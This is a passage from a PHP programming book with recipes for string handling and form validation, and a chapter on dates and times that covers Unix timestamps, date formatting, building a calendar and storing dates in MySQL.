    substr_replace is very flexible. If you specify a negative value for the $start argument, it will begin the replacement operation counting from the end of the text instead of the beginning. The $length argument, which represents how much of the original text to replace, is optional. If this argument is omitted, everything from the $start position to the end of the string is replaced. If it’s set to zero, no text is replaced; the replacement string is inserted into the text at the location specified by the $start parameter. A negative value represents the number of characters from the end of the text at which the replacement operation will stop.

    How do I break up text into an array of lines?

    Let’s say that you have information contained within a string value that you’d like to split up into separate values, such as a list of tags separated by commas, or a list of items separated by newline characters. What’s the best way to complete this task?

    Solution

    If we assume that our piece of text contains line feed characters, we can use the explode function to break it up into an array of lines:
  • 111.

    <?php
    $text = <<<EOD
    This will be row 1
    This will be row 2
    This will be row 3
    This will be row 4
    EOD;
    $lines = explode(PHP_EOL, $text);
    echo '<table border="1">' . PHP_EOL;
    foreach ($lines as $line) {
        echo '<tr>' . PHP_EOL . '<td>' . $line . '</td>' . PHP_EOL . '</tr>' . PHP_EOL;
    }
    echo '</table>' . PHP_EOL;
    ?>

This script uses explode to break the text at the line feed characters and place the text into an array. The PHP_EOL constant, which holds the end-of-line (EOL) sequence of the operating system PHP is running on, is used for the line feed character to make the script more portable. (This works as long as the text itself uses that same line ending.) The array is then used to build an HTML table, which you can see in Figure 3.1.

Figure 3.1. Using explode to output text as a table

Discussion

It’s useful to know that the implode function does exactly the opposite of what we’ve seen here: it builds a string out of an array. Let’s add the following line to the above example (the separator comes first; the reversed argument order is no longer accepted as of PHP 8):

    echo implode(PHP_EOL, $lines);

Here’s the resulting output of our original string:
  • 112.

    This will be row 1
    This will be row 2
    This will be row 3
    This will be row 4

How do I trim whitespace from text?

When we’re dealing with form submissions, among other tasks, we often need to consider whitespace. Sometimes it’s submitted by the user in error (it is hard to see, after all). It may also be submitted on purpose by users who want to avoid filling in fields, for example.

The presence of whitespace in submitted data can cause problems for your application. The erroneous inclusion of whitespace could result in the storage of incorrect usernames or email addresses, for instance, so it’s useful to be able to trim the whitespace from submitted form values.

Solution

The trim function is another handy PHP tool. It removes whitespace characters at the start and end of strings, and works like this:

    <?php
    $string = ' This has whitespace at both ends ';
    // Remove that whitespace
    $string = trim($string);
    if (strlen($string) > 0) {
        ⋮ It's not just spaces…
    }
    ?>

This straightforward function allows us to make sure that a user can’t send us spaces instead of real data. If we merely want to trim whitespace from the left- or right-hand side of a string, we can use ltrim or rtrim respectively.

How do I output formatted text?

In certain situations text needs to be formatted in a specific way, for example when we’re working with prices, column alignments, and dates.
  • 113.

Solution

The powerful printf and sprintf functions produce a formatted string according to special formatting directives, the former sending the output to the screen, the latter returning it as a string. Formatting directives take the form of a % character followed by one or more directive elements. Here’s an example:

    <?php
    $fruit = array('banana', 'mango', 'pear');
    $price = array('30', '50', '35');
    $format = 'A %s costs %d cents.<br />';
    for ($i = 0; $i < 3; $i++) {
        printf($format, $fruit[$i], $price[$i]);
    }
    ?>

This script produces the following output:

    A banana costs 30 cents.
    A mango costs 50 cents.
    A pear costs 35 cents.

In this example, $format contains special characters, %s and %d, which printf and sprintf recognize and replace with the values we supply as arguments. The directives are swapped with values in the same order in which the arguments are passed to the function: %s will format a value as a string and %d will format the value as an integer.

To vary the order in which the values appear in the output, we can simply change the format string without having to change the order of the arguments passed to the printf or sprintf functions. Let’s use the array of values from the first example, but change the output such that the values appear in a different order:

    $format = '%2$d cents will buy you a %1$s.<br />';
    for ($i = 0; $i < 3; $i++) {
        printf($format, $fruit[$i], $price[$i]);
    }

The %2$d format character will format the second argument as a number. If you need to double-quote your format string for the sake of variable interpolation, you’ll
  • 114. need to escape the $ character. For example, here’s the format string we’d need if we wanted to add a newline character, \n, at the end:

    $format = "%2\$d cents will buy you a %1\$s.<br />\n";

These examples are very simple, but formatting directives such as padding, alignment, or floating point precision can be quite complex. For more details, refer to the sprintf page in The PHP Manual.[5]

[5] http://www.php.net/sprintf/

How do I validate submitted data?

Validating strings is an important part of implementing a web page form. How can you make sure that the data a user submits through a form is what it’s supposed to be (a URL or an email address, for example)? The submission of invalid data is a very common problem.

Solution

The typical approach to validation includes using plenty of regular expressions. Fortunately, PEAR::Validate is here to help, so we don’t need to reinvent the wheel. PEAR::Validate offers a main class for validating strings and values that are common to web applications, as well as a growing number of related internationalized classes for dealing with country-specific requirements like UK postcodes and social security numbers for residents of the USA. Each class contains a collection of static methods (methods that can be called without constructing an object from the class) that are used to validate a particular value.

Here’s how we might use three of the methods available in the main Validate class (namely string, email, and url) to validate the data received through a form:

pear_validate.php (excerpt)

    error_reporting(E_ALL);
    require_once 'strip_quotes.php';
    require_once 'Validate.php';
  • 115.

    $errors = array('name' => '', 'email' => '', 'url' => '');
    if (isset($_POST['submit'])) {
        $name_options = array(
            'format' => VALIDATE_ALPHA . VALIDATE_SPACE,
            'min_length' => 5
        );
        if (!Validate::string($_POST['name'], $name_options)) {
            $errors['name'] = ' class="error"';
        }
        if (!Validate::email($_POST['email'])) {
            $errors['email'] = ' class="error"';
        }
        if (!Validate::url($_POST['url'])) {
            $errors['url'] = ' class="error"';
        }
    }

First, we turn off E_STRICT error reporting with the error_reporting function because PEAR::Validate generates E_STRICT errors. (In PHP versions before 5.4, E_ALL does not include E_STRICT.) You can read more about this and other error-handling topics in Chapter 9.

Next, we include strip_quotes.php and the PEAR::Validate package. strip_quotes.php contains code that handles magic quotes (which you can read more about in the section called “Checking for Magic Quotes” in Chapter 1). We also create an array in the $errors variable to store the results of the field validation.

Then, having tested to see that the form was submitted, we call the validate methods statically to check the fields. The first check ascertains that the data in the name field is a string containing only letters from the alphabet or space characters, and is at least five characters long. This validation requirement is a custom requirement, and we define it with our $name_options array.

Next, we simply need to call the methods Validate::email and Validate::url in order to check the email and url fields submitted via the form. Note that if we pass the value true as the second argument, PEAR::Validate checks the existence of the specified host name against DNS, using PHP’s checkdnsrr function. Note also
  • 116. that this validation causes a time delay as the host communicates with the nearest DNS server.

In our $errors array, we store an empty string if the validation passes, and ' class="error"' if the validation fails. We insert this string into our form’s <label> tags. The addition of ' class="error"' to the label elements allows us to give users some visual feedback via CSS to indicate a validation error. Here’s the code for the form itself:

pear_validate.php (excerpt)

    <form class="userinfo" action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
    <?php
    // Escape the submitted values before echoing them back into the HTML
    $name = isset($_POST['name']) ? htmlspecialchars($_POST['name'], ENT_QUOTES) : '';
    $email = isset($_POST['email']) ? htmlspecialchars($_POST['email'], ENT_QUOTES) : '';
    $url = isset($_POST['url']) ? htmlspecialchars($_POST['url'], ENT_QUOTES) : '';
    ?>
    <legend>Enter your details</legend>
    <div>
      <label<?php echo $errors['name']; ?>>Name:</label>
      <span>
        <input type="text" name="name" value="<?php echo $name; ?>" />
      </span>
    </div>
    <div>
      <label<?php echo $errors['email']; ?>>Email:</label>
      <span>
        <input type="text" name="email" value="<?php echo $email; ?>" />
      </span>
    </div>
    <div>
      <label<?php echo $errors['url']; ?>>Website:</label>
      <span>
        <input type="text" name="url" value="<?php echo $url; ?>" />
      </span>
    </div>
    <div>
      <span>
        <input type="submit" name="submit" value="send" />
  • 117.

      </span>
    </div>
    </form>

When it’s viewed in a browser, the form will look something like Figure 3.2.

Figure 3.2. The form displaying before validation

When we rebuild the form after submission, we use the $errors array and some CSS to highlight form labels with red:

pear_validate.php (excerpt)

    .error {
        color: red;
        font-weight: bold;
    }

This lets users know which part of the input was invalid, as shown in Figure 3.3.
  • 118.

Figure 3.3. The form displaying after validation

Of course, merely changing the color of the labels to red is not very informative; you can improve this example by adding field validation messages to let users know exactly how to fix the validation problems.

Discussion

Validating user input and communicating errors to the user is one of the most vital tasks you will perform as a web developer. Of course, if PEAR::Validate is simply too complex for your needs, you may find the built-in ctype_* functions are more to your liking.[6] Just remember: in the interests of security, it’s imperative that you validate all user input, and that you escape it before outputting it as HTML or saving it to your database.

[6] http://www.php.net/c_type/

Summary

You should now have a good idea of what can be achieved with PHP’s normal string functions. If you can get by just using those, do so: they’re fast and easy to use, and are far less prone to error than are regular expressions.

String manipulation is the core of what we PHP developers do. From user input to application output (HTML to a browser, SQL to a database), knowing how to handle strings safely, securely, and efficiently is one of the most important skills a PHP professional can have.
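As a rough illustration of the advice in the Discussion above, the following sketch pairs one of the built-in ctype_* functions with htmlspecialchars. The helper names isPlausibleUsername and escapeHtml, the five-character minimum, and the UTF-8 charset are assumptions made for this example; they are not part of PEAR::Validate or of the chapter’s own code.

```php
<?php
// Hypothetical helper: accept only letters and digits, at least $minLength long.
function isPlausibleUsername($value, $minLength = 5)
{
    // ctype_alnum returns false for an empty string, so no separate check is needed
    return is_string($value)
        && ctype_alnum($value)
        && strlen($value) >= $minLength;
}

// Hypothetical helper: escape a value before echoing it into HTML.
function escapeHtml($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

echo isPlausibleUsername('alice42') ? 'valid' : 'invalid';
echo PHP_EOL;
echo escapeHtml('<b>"quoted"</b>') . PHP_EOL;
```

Keeping validation (is the value acceptable?) separate from escaping (is the value safe to print?) means that neither step has to be trusted to do the other’s job.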
  • 119.

Chapter 4
Dates and Times

Wouldn’t it be nice if we had a ten-day week? How about 100 minutes in an hour? Ten months each year?

Dates and times are probably something you take for granted. You deal with them every day and are probably unaware of the clever mathematical algorithms your brain uses to anticipate how long you have to wait before Friday evening comes around again. It’s only when you start programming with dates and times that you realize that what you’ve taken for granted all these years is not so easy to deal with in code. Blame it on the Romans!

In our day-to-day lives, we’re used to working with decimal (base ten) numbers, which are optimized for dealing with groups of ten (ten ones in ten, ten tens in a hundred, ten hundreds in a thousand, and so on). I’ll avoid giving you a math lecture, but basically the problem with dates and times is that they don’t break down neatly into groups of ten. Consider this:

■ In one second you have one thousand milliseconds. No problem.
■ In one minute you have 60 seconds.
■ In one hour you have 60 minutes.
  • 120.
■ In one day you have 24 hours.

So, how do you calculate the number of days given a value in milliseconds? That’s a stack of long division! And that’s just time. What about dates?

■ In one week, you have seven days (does your week begin on Sunday or Monday?).
■ In one month you have … er … you don’t know exactly how many days or weeks; it depends on the month (and let’s not get started on leap years!).
■ In one year, you have 12 months.

Of course, that’s easy enough. How about making it more difficult? You often need to be able to express a date in multiple formats such as “Tuesday 18th March, 2003,” “03/18/03” (USA format), “18/03/03” (European format), “18th Mar 2003,” and “20030318” (a MySQL-style timestamp), not to forget “1047942000” (a Unix timestamp)!

How do you plan to display a list of articles fetched from a database and ordered by date? What if you want to present something more complex, such as an online calendar?

As you can see, there’s a lot to think about when working with dates and times in your applications. Fortunately, PHP really helps when it comes to making times and dates as painless as possible, thanks to powerful functions like date, but it’s important to develop the right strategy for dealing with dates and times early in your career as a PHP programmer. Take the right approach from day one, and you’ll avoid having to go back later and write insanely complex code to fix the mistakes you made as a newbie.

In this chapter, we’ll be looking at the kinds of strategies you can employ, and solving some of the common problems you’ll face when it comes to programming dates and times.

How do I use Unix timestamps?

Timestamps are numbers that identify dates and times in a format that can be used to solve the types of problems you’ll typically encounter in your applications; they make it easier to perform operations such as ordering a list or comparing two dates.
As a PHP developer, you’re likely to come across two types of timestamps: Unix timestamps and MySQL (or other database management system) timestamps.
  • 121. Unix timestamps are generally the most effective format in which to represent and manipulate date and time values; they’re a simple solution to a tricky problem. A Unix timestamp reflects the number of seconds that have passed since the epoch: January 1, 1970, 00:00:00 GMT. Converting dates to their Unix timestamps makes date- and time-related calculations easy in PHP. Let’s have a look at how they work.

Solution

PHP provides functions such as time and mktime to help us deal with Unix timestamps. time will return the current time as a Unix timestamp. As of PHP 5.1, the global variable $_SERVER['REQUEST_TIME'] holds the timestamp of the start of the current request. mktime will return a timestamp for a specified date. We use mktime like this:

    $timestamp = mktime($hour, $minute, $second, $month, $day, $year);

Discussion

The downside of Unix timestamps is that, unless you’re some kind of savant, they’re not human-readable. If I were to tell you that 1047994036 was the number of seconds that had passed since January 1, 1970, how fast could you tell me what the date was?

The other problem with Unix timestamps is that they can only be used within a limited date range, depending on your operating system. On Linux-based systems, you should be able to go back to somewhere around 1902, and forward as far as 2037. On Windows-based operating systems, the oldest date may be as recent as January 1, 1970. The problem lies in the size of the number used to represent the time value. Any operating system can easily handle integer numbers up to a certain size (a 32-bit integer offers 4,294,967,296 distinct values, so a signed timestamp on current 32-bit operating systems tops out at 2,147,483,647), after which it must work harder to juggle oversized numbers. For the sake of efficiency, therefore, operating systems usually impose this “maximum” size on important values like dates and times.
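The range limit described above can be made concrete with a small sketch. It assumes a 64-bit build of PHP, so that the boundary values themselves cause no trouble, and it uses gmdate and gmmktime (the GMT counterparts of date and mktime) so that the results don’t depend on the server’s timezone. The variable names are illustrative only.

```php
<?php
// The largest and smallest values a signed 32-bit integer can hold
$max32 = 2147483647;   // 2^31 - 1
$min32 = -$max32 - 1;  // -2^31

// gmdate formats a timestamp as GMT, independent of the server timezone
echo gmdate('Y-m-d H:i:s', 0) . PHP_EOL;       // 1970-01-01 00:00:00 (the epoch)
echo gmdate('Y-m-d H:i:s', $max32) . PHP_EOL;  // 2038-01-19 03:14:07
echo gmdate('Y-m-d H:i:s', $min32) . PHP_EOL;  // 1901-12-13 20:45:52

// The "unreadable" timestamp quoted in the Discussion
echo gmdate('Y-m-d H:i:s', 1047994036) . PHP_EOL; // 2003-03-18 13:27:16

// gmmktime takes the same arguments as mktime:
// hour, minute, second, month, day, year
$timestamp = gmmktime(13, 27, 16, 3, 18, 2003);
echo $timestamp . PHP_EOL; // 1047994036
```

The two boundary dates are where a signed 32-bit counter of seconds runs out in either direction.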
Linux, at least, allows you to have negative integer values for dates; it’ll let you work with dates occurring before January 1, 1970, while PHP on Windows may complain about such dates. Moreover, on the flip side of this issue, another potentially Y2K-like problem that will affect all 32-bit operating systems still in existence looms over the date January 19, 2038.
  • 122. Perform a Google search for that date and you’ll see what I mean. Although 2038 is a long way off and the timestamp issue may influence no more than your choice of pacemaker, it’s worth bearing this glitch in mind if you’re planning an application that will need to work with dates from the distant past or future (perhaps on a history web site). To see the problem in action, try running the following script on as many different operating systems as you can:

    <?php
    echo '1st Jan 1899: ' . mktime(0, 0, 0, 1, 1, 1899) . '<br />';
    echo '1st Jan 1902: ' . mktime(0, 0, 0, 1, 1, 1902) . '<br />';
    echo '31st Dec 1969: ' . mktime(0, 0, 0, 12, 31, 1969) . '<br />';
    echo '1st Jan 1970: ' . mktime(0, 0, 0, 1, 1, 1970) . '<br />';
    echo '1st Jan 2037: ' . mktime(0, 0, 0, 1, 1, 2037) . '<br />';
    echo '1st Jan 2038: ' . mktime(0, 0, 0, 1, 1, 2038) . '<br />';
    echo '19th Jan 2038: ' . mktime(0, 0, 0, 1, 19, 2038) . '<br />';
    echo '20th Jan 2038: ' . mktime(0, 0, 0, 1, 20, 2038) . '<br />';
    echo '1st Jan 2039: ' . mktime(0, 0, 0, 1, 1, 2039) . '<br />';
    ?>

Depending on your operating system (it’s a particular problem on Windows), this example may generate a range of different PHP warnings.

Another aspect to be aware of when you’re dealing with Unix timestamps is that they vary in length; a timestamp from January 2, 1970 will obviously be shorter than a contemporary timestamp. When you place Unix timestamps in your database, bear in mind that a MySQL INT column is itself a signed 32-bit value, so it holds timestamps only up to January 19, 2038; the 11 in INT(11) is merely a display width. If your application needs to store later dates, a BIGINT column is the safer choice.

How do I obtain the current date?

Simple as it may seem, obtaining the current date can soon become tricky. With a multitude of possible client and server timezones and daylight-saving time shifts in action at any given point in time, you can see how this exercise can quickly become more complicated than it first appears.
  • 123.

Solution

The simplest way to obtain the current date according to your server is to use the time function. time returns a Unix timestamp for the current date. We can use the date function to format that date for human consumption:

    <?php
    $timestamp = time();
    echo date("F jS, Y", $timestamp); // November 7th, 2006
    ?>

The first argument to date is a series of placeholders that specify the format for the date. The most common placeholders can be seen in Table 4.1. If you fail to specify a timestamp argument, date defaults to the current date.

Discussion

A problem with simply formatting the result of the time function is that date presents it in the server’s timezone, not your or your visitor’s timezone. To address this problem, we can use the date.timezone setting in php.ini or the date_default_timezone_set function, which will change the timezone for all date-related functions:

    <?php
    $timestamp = time();
    echo date("F jS, Y", $timestamp) . '<br />'; // August 24th, 2007
    date_default_timezone_set('America/New_York');
    echo date("F jS, Y H:i:s") . '<br />'; // August 24th, 2007 03:06:29
    date_default_timezone_set('Africa/Cairo');
    echo date("F jS, Y H:i:s"); // August 24th, 2007 10:06:29
    ?>
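Where changing the default timezone for the whole script is undesirable, one alternative is to use PHP’s DateTime and DateTimeZone classes (available since PHP 5.2). The sketch below is illustrative only: formatInZone is a hypothetical helper, and the fixed timestamp was picked so that the New York result matches the time shown in the comments above.

```php
<?php
// Hypothetical helper: format one instant for a given timezone
// without touching the script-wide default timezone.
function formatInZone($timestamp, $zoneName, $format = 'F jS, Y H:i:s')
{
    // '@' followed by a Unix timestamp creates a DateTime in UTC
    $moment = new DateTime('@' . $timestamp);
    $moment->setTimezone(new DateTimeZone($zoneName));
    return $moment->format($format);
}

$timestamp = 1187939189; // August 24th, 2007 07:06:29 UTC

echo formatInZone($timestamp, 'UTC') . PHP_EOL;              // August 24th, 2007 07:06:29
echo formatInZone($timestamp, 'America/New_York') . PHP_EOL; // August 24th, 2007 03:06:29
echo formatInZone($timestamp, 'Africa/Cairo') . PHP_EOL;
```

Because the timezone is passed in explicitly, the same helper can serve visitors in different timezones within a single request.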
  • 124.

Table 4.1. Most Common Placeholders

    Placeholder        Description
    d                  day of the month, two digits with leading zeros
    D                  a textual representation of a day, three letters
    j                  day of the month without leading zeros
    l (lowercase L)    a full textual representation of the day of the week
    S                  English ordinal suffix for the day of the month, two characters
    F                  a full textual representation of a month, such as January or March
    m                  numeric representation of a month, with leading zeros
    M                  a short textual representation of a month, three letters
    n                  numeric representation of a month, without leading zeros
    t                  number of days in the given month
    L                  whether or not it’s a leap year
    Y                  a full numeric representation of a year, four digits
    y                  a two-digit representation of a year
    a                  lowercase am or pm
    A                  uppercase AM or PM
    g                  12-hour format of an hour without leading zeros
    G                  24-hour format of an hour without leading zeros
    h                  12-hour format of an hour with leading zeros
    H                  24-hour format of an hour with leading zeros
    i                  minutes with leading zeros
    s                  seconds with leading zeros
    I (capital i)      whether or not the date is in daylight saving time
    O                  difference to Greenwich time (GMT) in hours
    P                  difference to Greenwich time (GMT) with colon between hours and minutes (added in PHP 5.1.3)
    T                  timezone setting of this machine
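To see a few of the placeholders from Table 4.1 side by side, here is a short sketch. It formats one fixed timestamp with gmdate, which accepts the same placeholders as date but always works in GMT, so the output doesn’t depend on the server’s timezone. The timestamp is an arbitrary value chosen for illustration.

```php
<?php
$timestamp = 1187939189; // an arbitrary moment: 24 August 2007, 07:06:29 GMT

$samples = array(
    'l jS F Y' => gmdate('l jS F Y', $timestamp), // Friday 24th August 2007
    'D, d M y' => gmdate('D, d M y', $timestamp), // Fri, 24 Aug 07
    'g:i a'    => gmdate('g:i a', $timestamp),    // 7:06 am
    'H:i:s'    => gmdate('H:i:s', $timestamp),    // 07:06:29
    't'        => gmdate('t', $timestamp),        // 31 (days in August)
    'L'        => gmdate('L', $timestamp),        // 0 (2007 is not a leap year)
);

foreach ($samples as $format => $result) {
    echo $format . ' => ' . $result . PHP_EOL;
}
```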
  • 125.

How do I find a day of the week?

We arrange our lives by the days of the week. When we humans talk about dates, we often use phrases like “next Tuesday” or “last Wednesday.” It’s easier for us to understand dates this way than, say, reading a date and having to work out that it means next Tuesday. So, given any date, say “May 31st 1984,” in an arbitrary format, how can we easily determine the day of the week this date represents?

Solution

Rather than trying to write a complex parser to convert our date to a timestamp, and then performing complex mathematics on the number of seconds that have elapsed since that date, we simply pass the date to the strtotime function. The strtotime function has a seemingly limitless ability to understand dates and convert them automatically to a Unix timestamp, which we can then use with the date function and the l (lowercase L) placeholder. Here’s strtotime in action:

    <?php
    $timestamp = strtotime("May 31st 1984");
    $weekday = date("l", $timestamp);
    echo $weekday; // Thursday
    ?>

How do I find the number of days in a month?

A common task, especially when writing date-based applications such as calendars, is to find the number of days in a month. And don’t forget that tricky month, February! Fortunately, it’s easy to obtain the number of days in a month using PHP.

Solution

We use the strtotime function and the date function, with the t placeholder, to gain this information easily:
  • 126.

    <?php
    // Name the first of the month explicitly: a bare month name keeps
    // today's day of the month, which can spill into the next month
    $timestamp = strtotime("1 October");
    $days = date("t", $timestamp);
    echo $days; // 31
    ?>

How do I create a calendar?

There comes a time in the lives of all developers when they encounter the intimidating task of creating a calendar of some description. Knowing where to begin is often the first hurdle.

Solution

As you’re probably beginning to discern from our previous discussion, strtotime is a very powerful function. In fact, you’ve seen only a small portion of its abilities so far. As well as calendar dates, strtotime allows you to pass in more arbitrary, human-readable expressions, such as +1 week, next friday, last saturday or even +1 year 6 months 38 days 15 hours 26 minutes 12 seconds.

By utilizing strtotime’s impressive capabilities, and with a little help from PEAR’s HTML_Table_Matrix class,[1] we can create a simple calendar with remarkable ease. Let’s get started:

calendar.php (excerpt)

    error_reporting(E_ALL);
    require_once "HTML/Table/Matrix.php";
    define("EMPTY_COLUMN", "");

First, we turn off E_STRICT error reporting with the error_reporting function because PEAR::HTML_Table_Matrix generates E_STRICT errors (before PHP 5.4, E_ALL does not include E_STRICT). You can read more about this and other error-handling topics in Chapter 9. Next, we include the HTML_Table_Matrix package, and define a constant, EMPTY_COLUMN, in order to make our code more readable.

Next, we perform validation on the month-and-year values:

[1] You can read all about HTML_Table_Matrix at http://pear.php.net/package/HTML_Table_Matrix/docs/1.0.5/HTML_Table_Matrix/HTML_Table_Matrix.html.
  • 127.

calendar.php (excerpt)

    $months = array("January", "February", "March", "April", "May",
        "June", "July", "August", "September", "October",
        "November", "December");
    if (isset($_GET['month']) && in_array($_GET['month'], $months)) {
        $month = $_GET['month'];
    } else {
        $month = date("F");
    }
    if (isset($_GET['year']) && is_numeric($_GET['year']) &&
        $_GET['year'] >= 1970 && $_GET['year'] <= 2038) {
        $year = $_GET['year'];
    } else {
        $year = date("Y");
    }

Above, we defined an array of allowed values for the $month variable. This is our whitelist, which is used to make sure a valid month is passed. If no value or an invalid value is passed, we use the current month.

To complete our input validation, we make sure that the $_GET['year'] value is between 1970 and 2038. Again, if no value or an invalid value is passed, we use the current year.

The next step is to get the timestamps for the first day and the last day of the given month in the given year:

calendar.php (excerpt)

    $start_date = strtotime("$month 1st $year");
    $end_date = strtotime("$month " . date("t", $start_date) . " $year");

We then create an array of numbers that represent the first to the last day of the month:
  • 128.

calendar.php (excerpt)

    $date_range = range(1, date("t", $start_date));

Here, we use the -1 month and +1 month modifiers to create timestamps for the previous and next months, and do the same for the previous and next years:

calendar.php (excerpt)

    $previous_month = strtotime("-1 month", $start_date);
    $next_month = strtotime("+1 month", $start_date);
    $previous_year = strtotime("-1 year", $start_date);
    $next_year = strtotime("+1 year", $start_date);

To make life simpler and to avoid duplication, we use sprintf and the following string formatter to create the links that will allow users to move backward and forward by one year or one month:

calendar.php (excerpt)

    $html = "<a href='" . $_SERVER['SCRIPT_NAME'] .
        "?month=%s&amp;year=%s'>%s</a>";

Next, we start to create an array that represents our calendar. Here we construct our first table row, which consists of a link to show the previous year. This is followed by text that represents the current year being viewed, and finally, a link to show the next year. We use the EMPTY_COLUMN constant to denote columns that should be left empty:

calendar.php (excerpt)

    if (date("Y", $previous_year) >= 1970) {
        $calendar_data[] = sprintf($html, date("F", $start_date),
            date("Y", $previous_year), date("Y", $previous_year));
    } else {
        $calendar_data[] = EMPTY_COLUMN;
    }
  • 129.

    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = date("Y", $start_date);
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = EMPTY_COLUMN;
    if (date("Y", $next_year) < 2038 && date("Y", $next_year) != 1969) {
        $calendar_data[] = sprintf($html, date("F", $start_date),
            date("Y", $next_year), date("Y", $next_year));
    } else {
        $calendar_data[] = EMPTY_COLUMN;
    }

The next row is similar to the previous one, except that it shows links for the previous month, followed by the currently viewed month and the link for the next month, in that order:

calendar.php (excerpt)

    $calendar_data[] = sprintf($html, date("F", $previous_month),
        date("Y", $previous_month), date("M", $previous_month));
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = date("M", $start_date);
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = EMPTY_COLUMN;
    $calendar_data[] = sprintf($html, date("F", $next_month),
        date("Y", $next_month), date("M", $next_month));

The third row simply consists of the days of the week, starting from Monday:

calendar.php (excerpt)

    $calendar_data[] = "Mon";
    $calendar_data[] = "Tue";
    $calendar_data[] = "Wed";
    $calendar_data[] = "Thu";
  • 130.

    $calendar_data[] = "Fri";
    $calendar_data[] = "Sat";
    $calendar_data[] = "Sun";

To make sure that the numeric dates line up with the correct day of the week, we first insert a number of blank columns. We use the N placeholder in the date function so it returns the numeric day of the week (1 for Monday through 7 for Sunday) on which the first of the month will fall, and using a for loop, we add the EMPTY_COLUMN constant once for each weekday that precedes it:

calendar.php (excerpt)

    $blank_days = date("N", $start_date);
    for ($i = 1; (int) $blank_days > $i; $i++) {
        $calendar_data[] = EMPTY_COLUMN;
    }

We then add the numeric days of the current month to the calendar data array. Next, we instantiate our HTML_Table_Matrix object and pass our array to the setData method. And finally, we create a left-to-right, top-to-bottom HTML_Table_Matrix_Filler object so that our HTML_Table_Matrix can work out the rows and columns required for the final output:

calendar.php (excerpt)

    foreach ($date_range as $day) {
        $calendar_data[] = $day;
    }
    $calendar = new HTML_Table_Matrix();
    $calendar->setTableSize(8,7);
    $calendar->setData($calendar_data);
    $filler = HTML_Table_Matrix_Filler::factory("LRTB", $calendar);
    $calendar->accept($filler);

We use the toHTML method to display our results:
  • 131.

calendar.php (excerpt)

    <h1>PHP Calendar</h1>
    <div id="cal">
    <?php echo $calendar->toHTML(); ?>
    </div>

The finished product can be seen in Figure 4.1.

Figure 4.1. A calendar generated using PEAR::HTML_Table_Matrix

And there you have it. Be intimidated no more! Keep this solution handy in your PHP toolkit and you’ll be able to whip up a calendar in no time at all, no matter what the application.

How do I store dates in MySQL?

Human-readable dates come in a variety of formats that can suit many situations. However, these formats are not the best way to store dates.

At first glance, the easiest way to store dates in MySQL may appear to be to simply drop them in exactly as they’d appear on a web page; for example, “8th March 2003”. Be warned: taking this route is the first step on the path to serious hair loss and ulcers. For example, the WHERE clause in an SQL statement run against MySQL will not allow you to do things like this:
  • 132.

    SELECT * FROM table WHERE date > '14th February 2007'

'14th February 2007' is not a date value; it’s only a date represented by a string. It can’t be manipulated or compared as a date value until it is converted into such a value. If you store your dates as strings you’ll be forever converting them to and from date value data types. And who needs that kind of headache?

Solution

A far better way to store date information is to use a MySQL timestamp. To get the current time, in the current server’s local timezone, we can use the NOW or CURRENT_TIMESTAMP functions. We can also use the UTC_TIMESTAMP function to obtain the timestamp in the UTC timezone:

    mysql> SELECT CURRENT_TIMESTAMP();
    +---------------------+
    | CURRENT_TIMESTAMP() |
    +---------------------+
    | 2007-11-05 21:18:28 |
    +---------------------+

    mysql> SELECT NOW();
    +---------------------+
    | NOW()               |
    +---------------------+
    | 2007-11-05 21:18:32 |
    +---------------------+

    mysql> SELECT UTC_TIMESTAMP();
    +---------------------+
    | UTC_TIMESTAMP()     |
    +---------------------+
    | 2007-11-06 02:18:44 |
    +---------------------+

Discussion

MySQL timestamps are simpler than Unix timestamps. The generalized form is YYYY-MM-DD HH:MM:SS and is typically stored in a column of type DATETIME (not to be confused with the column types DATE and TIME, which store only YYYY-MM-DD and HH:MM:SS respectively).
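Because the DATETIME format is just a fixed-width string, it is straightforward to produce and parse from PHP. The following sketch assumes that dates are stored in UTC (a common convention, but not something this chapter prescribes), and the helper names toMysqlDatetime and fromMysqlDatetime are made up for the example.

```php
<?php
// Hypothetical helper: Unix timestamp -> 'YYYY-MM-DD HH:MM:SS' in UTC
function toMysqlDatetime($timestamp)
{
    return gmdate('Y-m-d H:i:s', $timestamp);
}

// Hypothetical helper: 'YYYY-MM-DD HH:MM:SS' (assumed to be UTC) -> Unix timestamp
function fromMysqlDatetime($datetime)
{
    $moment = new DateTime($datetime, new DateTimeZone('UTC'));
    return (int) $moment->format('U');
}

$stored = toMysqlDatetime(1187939189);
echo $stored . PHP_EOL;                    // 2007-08-24 07:06:29
echo fromMysqlDatetime($stored) . PHP_EOL; // 1187939189
```

If the dates are stored in the server’s local timezone instead, the same idea applies with date in place of gmdate and the matching DateTimeZone.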
  • 133. Timestamps in this form are perfect for simple sorting and comparison operations, and they have the advantage of being human-readable. They also have a predictable length (until we get to the year 9999), which makes them easier to validate.

You can take advantage of the many native MySQL date and time functions via the native MySQL DATETIME column type, which is also easy to convert to a Unix timestamp if required.

How do I format MySQL timestamps?

MySQL timestamps, while human-readable, are not exactly human-friendly; you probably wouldn’t use them on your birthday party invitations, for example. Instead of 2008-02-14 13:00:00 I’m sure you’d much prefer to write “February 14th, 2008 at 1 p.m.” Lucky for us, making MySQL timestamps human-friendly is extremely easy, so your party invitations will look great. I promise!

Solution

MySQL, like PHP, has a date formatting function which, aptly, is named the DATE_FORMAT function. To use this function, we simply pass a timestamp and a format string as follows:

    mysql> SELECT DATE_FORMAT(NOW(), "%W %M %D, %Y");
    +------------------------------------+
    | DATE_FORMAT(NOW(), "%W %M %D, %Y") |
    +------------------------------------+
    | Monday October 8th, 2007           |
    +------------------------------------+
  • 134.

Table 4.2. DATE_FORMAT Specifiers

    Specifier        Description
    %a               abbreviated weekday name (Sun … Sat)
    %b               abbreviated month name (Jan … Dec)
    %c               month, numeric (0 … 12)
    %D               day of the month with English suffix (0th, 1st, 2nd, 3rd, …)
    %d               day of the month, numeric (00 … 31)
    %e               day of the month, numeric (0 … 31)
    %f               microseconds (000000 … 999999)
    %H or %k         hour (00 … 23)
    %h, %I, or %l    hour (01 … 12)
    %i               minutes, numeric (00 … 59)
    %M               month name (January … December)
    %m               month, numeric (00 … 12)
    %p               AM or PM
